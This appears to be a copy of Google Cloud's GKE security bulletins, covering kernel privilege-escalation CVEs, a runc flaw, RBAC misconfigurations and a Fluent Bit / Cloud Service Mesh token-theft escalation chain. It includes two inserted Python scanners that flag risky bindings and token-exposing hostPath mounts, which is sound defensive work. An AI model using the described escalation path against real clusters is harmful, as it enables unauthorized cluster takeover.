---|---|
CVE-2023-5528 allows an attacker to create pods and persistent volumes on Windows nodes in a way that enables admin privilege escalation on those nodes. GKE on Bare Metal clusters aren't affected.
What should I do?
No action required. |
None |
GCP-2024-005
Published: 2024-01-31
Updated: 2024-05-06
Reference: CVE-2024-21626
2024-05-06 Update: Added patch versions for GKE on AWS and GKE on Azure.
2024-04-02 Update: Added patch versions for GKE on Bare Metal
2024-03-06 Update: Added patch versions for GKE on VMware
2024-02-28 Update: Added patch versions for Ubuntu
2024-02-15 Update: Clarified that the 1.25 and 1.26 Ubuntu patch versions in the 2024-02-14 update might cause unhealthy nodes.
2024-02-14 Update: Added patch versions for Ubuntu
2024-02-06 Update: Added patch versions for Container-Optimized OS.
GKE
Updated: 2024-03-06
Description | Severity |
---|---|
A security vulnerability, CVE-2024-21626, has been discovered in GKE Standard and Autopilot clusters are impacted. Clusters using GKE Sandbox aren't impacted.
What should I do?
2024-02-28 Update: The following versions of GKE have been updated with code to fix this vulnerability in Ubuntu. Upgrade your Ubuntu node pools to one of the following patch versions or later:
2024-02-15 Update: Due to an issue, the following Ubuntu patch versions from the 2024-02-14 update might cause your nodes to enter an unhealthy state. Don't upgrade to the following patch versions. We'll update this bulletin when newer patch versions for Ubuntu are available for 1.25 and 1.26.
If you already upgraded to one of these patch versions, manually downgrade your node pool to an earlier version in your release channel.
2024-02-14 Update: The following versions of GKE have been updated with code to fix this vulnerability in Ubuntu. Upgrade your Ubuntu node pools to one of the following patch versions or later:
2024-02-06 Update: The following versions of GKE have been updated with code to fix this vulnerability in Container-Optimized OS. For security purposes, even if you have node auto-upgrade enabled, we recommend that you manually upgrade your cluster and Container-Optimized OS node pools to one of the following GKE versions or later:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patch version becomes the default in your release channel. For details, see Run patch versions from a newer channel. We're updating GKE with code to fix this vulnerability. We'll update this bulletin when patch versions are available.
What vulnerabilities are addressed by this patch?
|
High |
GKE on VMware
Updated: 2024-03-06
Description | Severity |
---|---|
A security vulnerability, CVE-2024-21626, has been discovered in
What should I do?
2024-03-06 Update: The following versions of GKE on VMware have been updated with code to fix this vulnerability. Upgrade your clusters to the following versions or later:
Patch versions and a severity assessment for GKE on VMware are in progress. We'll update this bulletin with that information when it's available.
What vulnerabilities are addressed by this patch?
|
High |
GKE on AWS
Updated: 2024-05-06
Description | Severity |
---|---|
A security vulnerability, CVE-2024-21626, has been discovered in
What should I do?
2024-05-06 Update: The following versions of GKE on AWS have been updated with patches for CVE-2024-21626:
Patch versions and a severity assessment for GKE on AWS are in progress. We'll update this bulletin with that information when it's available.
What vulnerabilities are addressed by this patch?
|
High |
GKE on Azure
Updated: 2024-05-06
Description | Severity |
---|---|
A security vulnerability, CVE-2024-21626, has been discovered in
What should I do?
2024-05-06 Update: The following versions of GKE on Azure have been updated with patches for CVE-2024-21626:
Patch versions and a severity assessment for GKE on Azure are in progress. We'll update this bulletin with that information when it's available.
What vulnerabilities are addressed by this patch?
|
High |
GKE on Bare Metal
Updated: 2024-04-02
Description | Severity |
---|---|
A security vulnerability, CVE-2024-21626, has been discovered in
What should I do?
2024-04-02 Update: The following versions of GKE on Bare Metal have been updated with code to fix this vulnerability. Upgrade your clusters to the following versions or later:
Patch versions and a severity assessment for GKE on Bare Metal are in progress. We'll update this bulletin with that information when it's available.
What vulnerabilities are addressed by this patch?
|
High |
GCP-2024-004
Published: 2024-01-24
Updated: 2024-02-07
Reference:
CVE-2023-6817
2024-02-07 Update: Added patch versions for Ubuntu.
GKE
Updated: 2024-02-07
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
GKE Standard clusters are impacted. GKE Autopilot clusters in the default configuration are not impacted, but might be vulnerable if you explicitly set the seccomp Clusters using GKE Sandbox aren't impacted.
What should I do?
2024-02-07 Update: The following minor versions are affected. Upgrade your Ubuntu node pools to one of the following patch versions or later:
The following minor versions are affected. Upgrade your Container-Optimized OS node pools to one of the following patch versions or later:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patch version becomes the default in your release channel. For details, see Run patch versions from a newer channel. |
High |
GKE on VMware
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on Bare Metal
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do?
There is no action required. GKE on Bare Metal isn't affected as it does not bundle an operating system in its distribution. |
None |
GCP-2024-003
Published: 2024-01-19
Updated: 2024-01-26
2024-01-26 Update: Clarified the number of affected clusters and the actions that we took to help mitigate the impact.
GKE
Updated: 2024-01-26
Description | Severity |
---|---|
2024-01-26 Update: Security research that found a small number of GKE clusters with a customer-created misconfiguration involving the We have identified several clusters where users have granted Kubernetes privileges to the Recently, a security researcher reported findings of clusters with RBAC misconfigurations through our vulnerability reporting program.
Google's approach to authentication is to make authenticating to Google Cloud and GKE as simple and secure as possible without adding complex configuration steps. Authentication just tells us who the user is; Authorization is where access is determined. So the With this in mind we've taken several steps to reduce the risk of users making authorization errors with the Kubernetes built-in users and groups, including To protect users from accidental authorization errors with these system users/groups, we have:
Clusters that apply authorized networks restrictions have a first layer of defense: they cannot be attacked directly from the Internet. But we still recommend removing these bindings for defense in depth and to guard against errors in network controls. We are investigating ways we can further protect against user RBAC misconfiguration with these system users/groups through prevention and detection.
What should I do?
To prevent any new bindings of Existing bindings should be reviewed following this guidance. |
Medium |
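An added example, not part of this bulletin, of the binding review the entry above asks for: it reads the JSON that kubectl get clusterrolebindings,rolebindings -A -o json returns and reports every binding whose subject is one of the Kubernetes built-in identities system:authenticated, system:unauthenticated or system:anonymous (these are real Kubernetes identities; which of them the bulletin names is not visible on this page). The sample bindings and the list of default discovery bindings to skip are this example's assumptions.

```python
"""Report RBAC bindings that grant rights to Kubernetes built-in anonymous/authenticated identities."""
import json
from typing import Dict, List

# Identities every caller holds without being enrolled anywhere: a request with valid
# credentials is in system:authenticated; one without is system:anonymous and
# system:unauthenticated. Binding privileges to them grants those privileges to anyone
# who can reach the API server.
BUILTIN_GROUPS = {"system:authenticated", "system:unauthenticated"}
BUILTIN_USERS = {"system:anonymous"}

# ClusterRoleBindings Kubernetes itself installs for API discovery. They are skipped so
# the report lists only what a cluster operator added (assumption of this example:
# compare against your own cluster's baseline before relying on this list).
DEFAULT_CLUSTER_BINDINGS = {"system:basic-user", "system:discovery", "system:public-info-viewer"}


def builtin_subjects(binding: dict) -> List[str]:
    """Return the binding's subjects that are built-in users or groups."""
    hits = []
    for subject in binding.get("subjects") or []:
        kind, name = subject.get("kind"), subject.get("name")
        if (kind == "Group" and name in BUILTIN_GROUPS) or (kind == "User" and name in BUILTIN_USERS):
            hits.append(f"{kind}/{name}")
    return hits


def risky_bindings(binding_list: dict) -> List[Dict[str, str]]:
    """Scan a kubectl -o json List of RoleBindings and ClusterRoleBindings."""
    findings = []
    for binding in binding_list.get("items") or []:
        meta = binding.get("metadata") or {}
        name = meta.get("name", "")
        if binding.get("kind") == "ClusterRoleBinding" and name in DEFAULT_CLUSTER_BINDINGS:
            continue
        hits = builtin_subjects(binding)
        if not hits:
            continue
        role = binding.get("roleRef") or {}
        findings.append({
            "kind": binding.get("kind", ""),
            "namespace": meta.get("namespace", ""),
            "name": name,
            "roleRef": f"{role.get('kind')}/{role.get('name')}",
            "subjects": ", ".join(hits),
        })
    return findings


def risky_bindings_from_json(text: str) -> List[Dict[str, str]]:
    """Convenience wrapper for piping kubectl output straight in."""
    return risky_bindings(json.loads(text))


# Constructed sample shaped like `kubectl get clusterrolebindings,rolebindings -A -o json`.
SAMPLE_BINDINGS = {
    "kind": "List",
    "items": [
        {"kind": "ClusterRoleBinding", "metadata": {"name": "system:basic-user"},
         "roleRef": {"kind": "ClusterRole", "name": "system:basic-user"},
         "subjects": [{"kind": "Group", "name": "system:authenticated"}]},
        {"kind": "ClusterRoleBinding", "metadata": {"name": "everyone-is-admin"},
         "roleRef": {"kind": "ClusterRole", "name": "cluster-admin"},
         "subjects": [{"kind": "Group", "name": "system:authenticated"}]},
        {"kind": "RoleBinding", "metadata": {"name": "anon-read", "namespace": "team-a"},
         "roleRef": {"kind": "ClusterRole", "name": "view"},
         "subjects": [{"kind": "User", "name": "system:anonymous"}]},
        {"kind": "RoleBinding", "metadata": {"name": "ci-deployer", "namespace": "team-a"},
         "roleRef": {"kind": "Role", "name": "deployer"},
         "subjects": [{"kind": "ServiceAccount", "name": "ci", "namespace": "team-a"}]},
    ],
}

if __name__ == "__main__":
    for finding in risky_bindings(SAMPLE_BINDINGS):
        print(finding)
```

A namespaced RoleBinding to one of these identities is reported as well as a ClusterRoleBinding: the bulletin's point is that authentication alone never limits who these groups contain, so any privilege bound to them, at any scope, is reachable by every caller.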
GKE on VMware
No updates at this time.
GKE on AWS
No updates at this time.
GKE on Azure
No updates at this time.
GKE on Bare Metal
No updates at this time.
GCP-2024-002
Published: 2024-01-17
Updated: 2024-02-20
Reference:
CVE-2023-6111
2024-02-20 Update: Added patch versions for GKE on VMware.
GKE
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS nodes.
GKE Standard clusters are impacted. GKE Autopilot clusters in the default configuration are not impacted, but might be vulnerable if you explicitly set the seccomp Clusters using GKE Sandbox aren't impacted.
What should I do?
The following minor versions are affected. Upgrade your Container-Optimized OS node pools to one of the following patch versions or later:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patch version becomes the default in your release channel. For details, see Run patch versions from a newer channel. |
High |
GKE on VMware
Updated: 2024-02-20
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS nodes.
What should I do?
2024-02-20 Update: The following versions of GKE on VMware are updated with code to fix this vulnerability. Upgrade your clusters to the following versions or later: 1.28.100 |
Pending |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS nodes.
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS nodes.
What should I do? |
Pending |
GKE on Bare Metal
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS nodes.
What should I do?
There is no action required. GKE on Bare Metal isn't affected as it does not bundle an operating system in its distribution. |
None |
GCP-2023-051
Published: 2023-12-28
Reference:
CVE-2023-3609
GKE
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
GKE Standard clusters are impacted. GKE Autopilot clusters in the default configuration are not impacted, but might be vulnerable if you explicitly set the seccomp Clusters using GKE Sandbox aren't impacted.
What should I do?
The following minor versions are affected. Upgrade your Container-Optimized OS node pools to one of the following patch versions or later:
The following minor versions are affected. Upgrade your Ubuntu node pools to one of the following patch versions or later:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patch version becomes the default in your release channel. For details, see Run patch versions from a newer channel. |
High |
GKE on VMware
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on Bare Metal
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do?
There is no action required. GKE on Bare Metal isn't affected as it does not bundle an operating system in its distribution. |
None |
GCP-2023-050
Published: 2023-12-27
Reference:
CVE-2023-3389
GKE
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
GKE Standard and Autopilot clusters are impacted. Clusters using GKE Sandbox aren't impacted.
What should I do?
The following minor versions are affected. Upgrade your Container-Optimized OS node pools to one of the following patch versions or later:
The following minor versions are affected. Upgrade your Ubuntu node pools to one of the following patch versions or later:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patch version becomes the default in your release channel. For details, see Run patch versions from a newer channel. |
High |
GKE on VMware
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on Bare Metal
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do?
There is no action required. GKE on Bare Metal isn't affected as it does not bundle an operating system in its distribution. |
None |
GCP-2023-049
Published: 2023-12-20
Reference:
CVE-2023-3090
GKE
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
GKE Standard clusters are impacted. GKE Autopilot clusters in the default configuration are not impacted, but might be vulnerable if you explicitly set the seccomp Clusters using GKE Sandbox aren't impacted.
What should I do?
The following minor versions are affected. Upgrade your Container-Optimized OS node pools to one of the following patch versions or later:
The following minor versions are affected. Upgrade your Ubuntu node pools to one of the following patch versions or later:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patch version becomes the default in your release channel. For details, see Run patch versions from a newer channel. |
High |
GKE on VMware
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on Bare Metal
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do?
There is no action required. GKE on Bare Metal isn't affected as it does not bundle an operating system in its distribution. |
None |
GCP-2023-048
Published: 2023-12-15
Updated: 2023-12-21
Reference:
CVE-2023-3390
2023-12-21 Update: Clarify that GKE Autopilot clusters in the default configuration are not impacted.
GKE
Updated: 2023-12-21
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
2023-12-21 Update: The original bulletin stated Autopilot clusters are impacted, but this was incorrect. GKE Autopilot clusters in the default configuration are not impacted, but might be vulnerable if you explicitly set the seccomp Unconfined profile or allow GKE Standard and Autopilot clusters are impacted. Clusters using GKE Sandbox aren't impacted.
What should I do?
The following minor versions are affected. Upgrade your Container-Optimized OS node pools to one of the following patch versions or later:
The following minor versions are affected. Upgrade your Ubuntu node pools to one of the following patch versions or later:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patch version becomes the default in your release channel. For details, see Run patch versions from a newer channel. |
High |
GKE on VMware
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on Bare Metal
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do?
There is no action required. GKE on Bare Metal isn't affected as it does not bundle an operating system in its distribution. |
None |
GCP-2023-047
Published: 2023-12-14
GKE
Description | Severity |
---|---|
An attacker who has compromised the Fluent Bit logging container could combine that access with high privileges required by Cloud Service Mesh (on clusters that have enabled it) to escalate privileges in the cluster. The issues with Fluent Bit and Cloud Service Mesh have been mitigated and fixes are now available. These vulnerabilities are not exploitable on their own in GKE and require an initial compromise. We are not aware of any instances of exploitation of these vulnerabilities. These issues were reported through our Vulnerability Reward Program.
What should I do?
The following versions of GKE have been updated with code to fix these vulnerabilities in Fluent Bit and for users of managed Cloud Service Mesh. For security purposes, even if you have node auto-upgrade enabled, we recommend that you manually upgrade your cluster and node pools to one of the following GKE versions or later:
A recent feature of release channels allows you to apply a patch without having to unsubscribe from a channel. This lets you secure your nodes until the new version becomes the default for your specific release channel. If your cluster uses in-cluster Cloud Service Mesh, you must manually upgrade to one of the following versions (release notes):
What vulnerabilities are being addressed by this patch?
The vulnerabilities addressed by this bulletin require an attacker to compromise the Fluent Bit logging container. We are not aware of any existing vulnerabilities in Fluent Bit that would lead to this prerequisite condition for privilege escalation. We have patched these vulnerabilities as hardening measures to prevent a potential full attack chain in the future. GKE uses Fluent Bit to process logs for workloads running on clusters. Fluent Bit on GKE was also configured to collect logs for Cloud Run workloads. The volume mount configured to collect those logs gave Fluent Bit access to Kubernetes service account tokens for other Pods running on the node. The researcher used this access to discover a highly privileged service account token for clusters that have Cloud Service Mesh enabled. Cloud Service Mesh required high privileges to make necessary modifications to a cluster's configuration, including the ability to create and delete Pods. The researcher used Cloud Service Mesh's privileged Kubernetes service account token to escalate their initial compromised privileges by creating a new pod with cluster-admin privileges. We have removed Fluent Bit's access to the service account tokens and have redesigned the functionality of Cloud Service Mesh to remove excess privileges. |
Medium |
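An added example, not code from GKE or from the researcher's report, of how to check your own workloads for the exposure described above: a hostPath volume that covers the kubelet's pod directory lets the mounting container read the projected service account tokens of every other Pod on the node, which is the first link in the chain this bulletin describes. The directory /var/lib/kubelet/pods is the kubelet default and is this example's assumption, as is the constructed log-agent Pod it scans.

```python
"""Find Pod hostPath mounts that expose other Pods' service account tokens on the node."""
from pathlib import PurePosixPath
from typing import Dict, List

# The kubelet materialises each Pod's volumes, including projected service account
# tokens, under this directory on the node. This is the default location; it is an
# assumption of this example if your nodes run the kubelet with a custom root-dir.
KUBELET_PODS_DIR = PurePosixPath("/var/lib/kubelet/pods")


def covers(host_path: str, target: PurePosixPath = KUBELET_PODS_DIR) -> bool:
    """True when mounting host_path exposes everything under target (equal or an ancestor)."""
    hp = PurePosixPath(host_path)
    return hp == target or hp in target.parents


def token_exposing_mounts(pod: dict) -> List[Dict[str, str]]:
    """Return every volumeMount backed by a hostPath that covers the kubelet pods directory."""
    spec = pod.get("spec") or {}
    volumes = {v["name"]: v for v in spec.get("volumes") or [] if "name" in v}
    findings = []
    for container in (spec.get("initContainers") or []) + (spec.get("containers") or []):
        for mount in container.get("volumeMounts") or []:
            volume = volumes.get(mount.get("name"))
            if not volume or "hostPath" not in volume:
                continue
            path = (volume["hostPath"] or {}).get("path", "")
            if path and covers(path):
                findings.append({
                    "container": container.get("name", ""),
                    "volume": volume["name"],
                    "hostPath": path,
                    "mountPath": mount.get("mountPath", ""),
                    # readOnly does not reduce the exposure: a token is usable once readable
                    "readOnly": str(bool(mount.get("readOnly", False))),
                })
    return findings


# Constructed sample Pod (not a real GKE manifest): a log agent that legitimately reads
# /var/log, but also mounts the kubelet pods directory, plus a sidecar mounting "/".
SAMPLE_POD = {
    "metadata": {"name": "log-agent-x1", "namespace": "logging"},
    "spec": {
        "volumes": [
            {"name": "varlog", "hostPath": {"path": "/var/log"}},
            {"name": "podvols", "hostPath": {"path": "/var/lib/kubelet/pods"}},
            {"name": "rootfs", "hostPath": {"path": "/"}},
            {"name": "cfg", "configMap": {"name": "agent-config"}},
        ],
        "containers": [
            {"name": "collector", "volumeMounts": [
                {"name": "varlog", "mountPath": "/var/log", "readOnly": True},
                {"name": "podvols", "mountPath": "/var/lib/kubelet/pods", "readOnly": True},
                {"name": "cfg", "mountPath": "/etc/agent"}]},
            {"name": "node-inspector", "volumeMounts": [
                {"name": "rootfs", "mountPath": "/host", "readOnly": True}]},
        ],
    },
}

if __name__ == "__main__":
    for finding in token_exposing_mounts(SAMPLE_POD):
        print(finding)
```

The /var/log mount is not reported: collecting node logs is what a logging agent is for, and the check fails only when the mounted tree also contains other Pods' projected volumes. Feed it the output of kubectl get pods -A -o json to review a whole cluster.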
GKE on VMware
Description | Severity |
---|---|
Only GKE on VMware clusters using Cloud Service Mesh are affected.
What should I do?
If your cluster uses in-cluster Cloud Service Mesh, you must manually upgrade to one of the following versions (release notes):
What vulnerabilities are addressed by this patch?
The vulnerabilities addressed by this bulletin require an attacker to first either compromise or otherwise break out of a container or have root on a cluster Node. We are not aware of any existing vulnerabilities that would lead to this prerequisite condition for privilege escalation. We have patched these vulnerabilities as hardening measures to prevent a potential full attack chain in the future. Cloud Service Mesh required high privileges to make necessary modifications to a cluster's configuration, including the ability to create and delete Pods. The researcher used Cloud Service Mesh's privileged Kubernetes service account token to escalate their initial compromised privileges by creating a new pod with cluster-admin privileges. We have redesigned the functionality of Cloud Service Mesh to remove excessive privileges. |
Medium |
GKE on AWS
Description | Severity |
---|---|
Only GKE on AWS clusters using Cloud Service Mesh are affected.
What should I do?
If your cluster uses in-cluster Cloud Service Mesh, you must manually upgrade to one of the following versions (release notes):
What vulnerabilities are addressed by this patch?
The vulnerabilities addressed by this bulletin require an attacker to first either compromise or otherwise break out of a container or have root on a cluster Node. We are not aware of any existing vulnerabilities that would lead to this prerequisite condition for privilege escalation. We have patched these vulnerabilities as hardening measures to prevent a potential full attack chain in the future. Cloud Service Mesh required high privileges to make necessary modifications to a cluster's configuration, including the ability to create and delete Pods. The researcher used Cloud Service Mesh's privileged Kubernetes service account token to escalate their initial compromised privileges by creating a new pod with cluster-admin privileges. We have redesigned the functionality of Cloud Service Mesh to remove excessive privileges. |
Medium |
GKE on Azure
Description | Severity |
---|---|
Only GKE on Azure clusters using Cloud Service Mesh are affected.
What should I do?
If your cluster uses in-cluster Cloud Service Mesh, you must manually upgrade to one of the following versions (release notes):
What vulnerabilities are addressed by this patch?
The vulnerabilities addressed by this bulletin require an attacker to first either compromise or otherwise break out of a container or have root on a cluster Node. We are not aware of any existing vulnerabilities that would lead to this prerequisite condition for privilege escalation. We have patched these vulnerabilities as hardening measures to prevent a potential full attack chain in the future. Cloud Service Mesh required high privileges to make necessary modifications to a cluster's configuration, including the ability to create and delete Pods. The researcher used Cloud Service Mesh's privileged Kubernetes service account token to escalate their initial compromised privileges by creating a new pod with cluster-admin privileges. We have redesigned the functionality of Cloud Service Mesh to remove excessive privileges. |
Medium |
GKE on Bare Metal
Description | Severity |
---|---|
Only GKE on Bare Metal clusters using Cloud Service Mesh are affected.
What should I do?
If your cluster uses in-cluster Cloud Service Mesh, you must manually upgrade to one of the following versions (release notes):
What vulnerabilities are addressed by this patch?
The vulnerabilities addressed by this bulletin require an attacker to first either compromise or otherwise break out of a container or have root on a cluster Node. We are not aware of any existing vulnerabilities that would lead to this prerequisite condition for privilege escalation. We have patched these vulnerabilities as hardening measures to prevent a potential full attack chain in the future. Cloud Service Mesh (formerly Anthos Service Mesh) required high privileges to make necessary modifications to a cluster's configuration, including the ability to create and delete Pods. The researcher used Cloud Service Mesh's privileged Kubernetes service account token to escalate their initial compromised privileges by creating a new pod with cluster-admin privileges. We have redesigned the functionality of Cloud Service Mesh to remove excessive privileges. |
Medium |
GCP-2023-046
Published: 2023-11-22
Updated: 2024-03-04
Reference:
CVE-2023-5717
2024-03-04 Update: Added GKE versions for GKE on VMware.
2024-01-22 Update: Added Ubuntu patch versions.
GKE
Updated: 2024-01-22
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
GKE Standard and Autopilot clusters are impacted. Clusters using GKE Sandbox aren't impacted.
What should I do?
2024-01-22 Update: The following minor versions are affected. Upgrade your Ubuntu node pools to one of the following patch versions or later:
The following minor versions are affected. Upgrade your Container-Optimized OS node pools to one of the following patch versions or later:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patch version becomes the default in your release channel. For details, see Run patch versions from a newer channel. |
High |
GKE on VMware
Updated: 2024-02-29
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do?
2024-03-04 Update: The following versions of GKE on VMware are updated with code to fix this vulnerability. Upgrade your clusters to the following versions or later:
|
High |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on Bare Metal
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do?
There is no action required. GKE on Bare Metal isn't affected as it does not bundle an operating system in its distribution. |
None |
GCP-2023-045
Published: 2023-11-20
Updated: 2023-12-21
Reference:
CVE-2023-5197
2023-12-21 Update: Clarify that GKE Autopilot clusters in the default configuration are not impacted.
GKE
Updated: 2023-12-21
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
2023-12-21 Update: The original bulletin stated Autopilot clusters are impacted, but this was incorrect. GKE Autopilot clusters in the default configuration are not impacted, but might be vulnerable if you explicitly set the seccomp Unconfined profile or allow GKE Standard and Autopilot clusters are impacted. Clusters using GKE Sandbox aren't impacted.
What should I do?
The following minor versions are affected. Upgrade your Container-Optimized OS node pools to one of the following patch versions or later:
The following minor versions are affected. Upgrade your Ubuntu node pools to one of the following patch versions or later:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patch version becomes the default in your release channel. For details, see Run patch versions from a newer channel. |
High |
GKE on VMware
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on Bare Metal
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do?
There is no action required. GKE on Bare Metal isn't affected as it does not bundle an operating system in its distribution. |
None |
GCP-2023-042
Published: 2023-11-13
Updated: 2023-11-15
Reference:
CVE-2023-4147
2023-11-15 Update: Clarify that only the listed minor versions need to upgrade to a corresponding patched version for GKE.
GKE
Updated: 2023-11-15
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
GKE Standard clusters are impacted. GKE Autopilot clusters aren't impacted. Clusters using GKE Sandbox aren't impacted.
What should I do?
2023-11-15 Update: You only need to upgrade to one of the patched versions that are listed in this bulletin if you use that minor version in your nodes. For example, if you use GKE version 1.27, you should upgrade to the corresponding patched version. However, if you use GKE version 1.24, you don't need to upgrade to a patched version. Upgrade your Container-Optimized OS node pools to one of the following versions or later:
Upgrade your Ubuntu node pools to one of the following versions or later:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patched version becomes the default in your release channel. For details, see Run patch versions from a newer channel. |
High |
GKE on VMware
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on Bare Metal
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do?
There is no action required. GKE on Bare Metal isn't affected as it does not bundle an operating system in its distribution. |
None |
GCP-2023-041
